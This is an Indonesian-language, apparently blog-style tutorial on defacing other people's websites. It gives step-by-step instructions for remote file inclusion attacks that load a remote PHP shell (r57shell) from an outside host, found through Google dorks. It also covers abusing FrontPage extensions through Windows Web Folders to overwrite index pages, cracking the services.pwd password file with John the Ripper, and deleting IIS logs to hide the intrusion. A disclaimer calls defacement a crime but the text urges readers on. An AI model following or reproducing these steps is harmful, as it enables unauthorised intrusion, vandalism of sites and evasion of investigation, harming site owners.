GUNAKANLAH DENGAN BIJAK!!!!. Saat ini mendeface website bukan suatu
pekerjaan yang sulit. Bahkan anak kecil pun jika diberitahu cara
mendeface, maka dia dapat mendeface ratusan situs!!! Deface adalah
kegiatan mengubah halaman website orang lain tanpa sepengetahuan orang
tersebut, pastinya ini adalah kejahatan dunia cyber. Deface terkenal
juga dengan sebutan cybergrafitti yaitu corat-coret website tertentu.
Deface dilakukan dengan memanfaatkan kelemahan dari website tersebut.
Nah bagi sobat blogger yang penasaran, gimana sih caranya? Ok cekidot
cara mudah untuk para newbie (termasuk gw tentunya yang newbie
hehehehe...) ^.^
Cara Mudah DEFACE Website
- Buka www.milw0rm.com
- Klik Search
- Ketik RFI (Remote File Inclusion)
- Cari Exploit terbaru atau CMS/Aplikasi yang terkenal
- Buka Google, dan liat Advisor yang kita pilih tersebut
- * Jika terdapat DORK[kata kunci google] gunakan lah Dork tersebut,
- * Jika tidak gunakanlah Judul dari Exploit tersebut
- Setelah dapat hasil dari Google, klik kanan Open NewTab[Nah ini
untung nya Pake Firefox, tapi IE versi terbaru sudah bisa Open NewTAB]
- Buka terus dari List/Daftar2 yang terdapat dari google, hingga kamu rasa penuh Browsernya
- Coba satu persatu dari hasil tersebut dengan Exploit Command yang terdapat di advisor
- Jika terjadi pesan error, cari Pesan error yang menyatakan kegagalan File Inclusion, bukan File Not Found.
- Jika menemukan File Not Found kemungkinan; salah Relative Path dari Site tersebut, atau memang beda versi, dan kemungkinan lain
- Jika menemukan pesan error dari File Inclusion, atau Blank Putih tanpa Pesan Error,
- Ganti command exploit setelah tanda '='[sama dengan] dengan http://bugs.byethost32.com/php3.txt? [phpshell yang OL/Aktif]
- Lihat ke Layar, apakah site tersebut berhasil mengeksekusi dan
menampilakan PHPShell r57shell atau hanya Blank Page, dan muncul kembali
File Inclusion
- Jika site berhasil memunculkan r57shell [phpshell] lanjutkan ke
pencarian File dan Direktory yang memilikik full akses atau -rwxrwxrwx /
-rw-rw-rw <-- untuk file | drwxrwxrwx / drw-rw-rw <-- untuk
direktory
- Jika telah mendapatkan file atau direktory diatas tersebut, kamu
bisa mengupload file index.html versi buatan kamu, atau mengubah
index.php or .html dengan versi code kamu jgn lupa nama manadocoding
dikibarkan disana...
- Setelah merubah file tersebut. Coba kamu lihat di browser sesuai dengan relatife path yang kamu ubah tadi.....
CARA LAINNYA :
Dan sesungguhnya terdapat banyak cara untuk mendeface suatu situs !!
Namun disini saya akan membahas mengenai cara yang paling mudah,
kebanyakan teknik yang digunakan oleh para hacker, termasuk di Brazil,
Arah, USA dan UK serta negara-negara lainnya. Dan ini bukan sekedar
“joke” namun bukti dari konsep. Cukup banyak situs besar yang telah
dihack karena bug ini termasuk situs NASA !!!
Bug…………..
Pertama kali berbicara mengenai bug. OK, Bugnya ada pada ekstensi
Frontpage yang ditemukan pada tahun 2000 namun masih aktif hingga hari
ini !!! Ekstensi Frontpage menjadi ‘enabled’ pada Webserver yang
barlainan sehingga admin dapat mengupload file ke server tersebut dari
komputer manapun pada intranet! Saat ini ekstensi Frontpage menjadi
‘enabled’ pada berbagai server yang selanjutnya didefinisikan menjadi 3
file pada server IIS:
www.site.com/_vti_bin/shtml.dll
www.site.com/_vti_bin/_vti_adm/admin.dll
www.site.com/_vti_bin/_vti_aut/author.dll
Dan jika server tersebut bukan merupakan IIS tapi server jenis lain,
seperti Apache maka file tersebut mempunyai ekstensi file .exe misalnya
author.exe Scanning Sekarang pertanyaannya adalah bagaimana menemukan
situs yang vulnerable! Atau situs yang memiliki ekstensi Frontpage yang
‘enabled’! OK, sangat mudah membuad suatu program yang dapat mencari
situs yang memiliki author.dll atau author.exe dan jika file tersebut
ditemukan maka server tersebut dikategorikan ‘vulnerable’. Baiklah,
sebelumnya saya sudah membuat program scanner untuk keperluan pribadi
tapi saat ini dapat didownload untuk publik. Anda dapat mendownload tool
ini yang saya beri nama “Universal Bug Scanner” dan anda memerlukan
Visual Studio yang terinstall pada computer anda agar dapat menggunakan
tool ini. OK?
Selanjutnya, kumpulkan daftar situs dengan menggunakan
google/alltheweb/vivisimo/britanica (atau search engine lainnya, meski
saya rekomendasikan agar menggunakan www.alltheweb.com, karena banyak
sekali situs yang vulnerable disini J jika dibandingkan dengan google
yang mengutamakan situs-situs yang tergolong secure seperti “asp” ,
“iis” atau sesuatu yang seperti itu! Kumpulkan daftar situs dan
simpanlah dalam suatu file.
Sekarang bukalah Universal Bug Scanner, upload file tersebut dan
mulailah proses scanning untuk mencari situs-situs yang vulnerable. Dan
jika anda ingin menjadi seorang elite hacker, maka sebaiknya anda
menggunakan program scanner buatan anda sendiri OK? Yeah, hal ini tidak
hanya meningkatkan pengetahuan tentang pemrograman anda tapi mendorong
anda untuk mengembangkan program scanner yang lebih powerful meliputi
jenis web server, SMTP dan berbagai jenis bug !!!
Deface!!!
1) Nah, sekarang bukalah window My Computer
2) dan double click “Web Folders”!!!
3) double click lagi “Add web folder” dan akan diminta nama situs.
4) Ketiklah nama situs yang tergolong vulnerable
5) click next
6) Setelah request diterima, click Finished.
Tapi jika dikatakan bahwa host not found, cobalah lagi. Dan jika anda mendapatkan warning yang sama, wah,
pasti ada masalah pada sistem windows anda. Install ulang, buddy J dan setelah suatu web folder dengan nama
situs yang vulnerable dibuat
7) Double click dan browse file-file target selayaknya anda menggunakan komputer sendiri!!!
Rename index.html dalam server tersebut dengan nama lain, misalnya indexold.html
9) Copylah index.html karya anda sendiri ke sistem korban. Hmm.. anda
sebenarnya dapat mengcopy, menghapus atau menambahkan sesuatu ke server
korban dengan menggunakan web folder sederhana yang anda buat saat ini
dan memperlakukannya selayaknya komputer anda sendiri!!! Keren bukan?
Cracking Password
Oopss… tapi tidak seluruh admin termasuk bodoh yang membiarkan server
mereka begitu saja di hacked. Dari 6 diantara 10 admin (sepanjang
serangan yang saya lakukan) memproteksi ekstensi frontpage mereka dengan
Password. Jadi saat anda melakukan double click, web folder tersebut
akan meminta suatu username dan password!!! Baiklah, jika anda tidak
ingin mengcrack password maka cobalah cari situs lain saja. Tapi jika
ingin meneruskan hacking web tersebut, maka perlu diperhatikan
langkah-langkah berikut ini:
Password untuk ekstensi front page tersimpan dalam file services.pwd dengan format berikut:
username:password
Baiklah, password tersebut tersimpan dalam form yang terenkripsi menggunakan Algorithma DES
(jangan khawatir tutorial mengenai masalah enkripsi-dekripsi/kriptografi
akan saya jelaskan nanti J. Ok, sekarang sama dengan algoritma yang
digunakan untuk mengenkripsi password pada sistem operasi Linux.
Jadi kita dapat menggunakan linux passwd cracker untuk mengcrack file
services.pwd. Arahkan browser anda ke situs www.openwall.com dan
downloadlah John the Ripper cracker. Sekarang downloadlah file
services.pwd dari mesin korban dan ubahlah file services.pwd sebagaimana
file passwd unix dengan tujuh field sebagai gantir dari dua yang
memberikan data acak seperti:
username:password:123:123:something:/home/couldbe_myname:/bin/bash
Ok begitu kita telah memisahkan tujuh field yang terpisah dengan “:”
sekarang gunakan JTR cracker untuk mengcrack password sebagaimana jika
kita mengcrack file passwd linux. Dan setelah itu kita akan mendapatkan
password yang sesungguhnya, masukkan dalam web folder dan lakukan
proses deface !!
Hei, tunggu dulu ada hal yang berbeda dan harus diperhatikan dalam proses hacking ini!!
Menyembunyikan identitas anda saat hacking adalah seni tersendiri. Anda dapat menuliskan suatu script asp
yang akan menghapus log dan menguplad file asp tersebut ke sistem korban dan bukalah file yang sama dari
browser anda. File log untuk IIS (win2000 server) biasanya tersimpan dalam folder
C:\\\\\\\\WINNT\\\\\\\\SYSTEM32\\\\\\\\LOGFILES\\\\\\\\W3SVC32, dan jika
anda tidak mengetahui format file log ini maka saya rekomendasikan
untuk menghapus semua data dalam file ini. Dan jangan khawatir ada
artikel yang membahas cara menghapus log, lengkap dengan source code
akan segera kami rilis. Jadi saat ini saya menganggap anda melakukan
deface web site melalui warung internet J keren khan!!! Ingat, sebaiknya
jangan melakukan hal ini dari komputer teman anda yang akan
menyeretnya dalam kesulitan yang anda timbulkan. Dan jika anda
melakukannya dari komputer di rumah anda sebaiknya jangan menghapus
segala
sesuatu dalam sistem tersebut, agar anda tidak dijerat oleh Undang-Undang Cyber yang berlaku.
Hmmm… deface pertama anda? Anda benar-benar beruntung. Tapi ingat hal
ini tidak akan pernah menjadikan anda sebagai seorang elite hacker
melainkan lamer (pengacau). Artikel ini hanya menjelaskan teknik populer
yang digunakan untuk mendeface. Anda akan terkejut saat mengetahui ada
banyak teknik deface yang ada di internet.
Semoga bermanfaat.. Sekali lagi GUNAKANLAH DENGAN BIJAK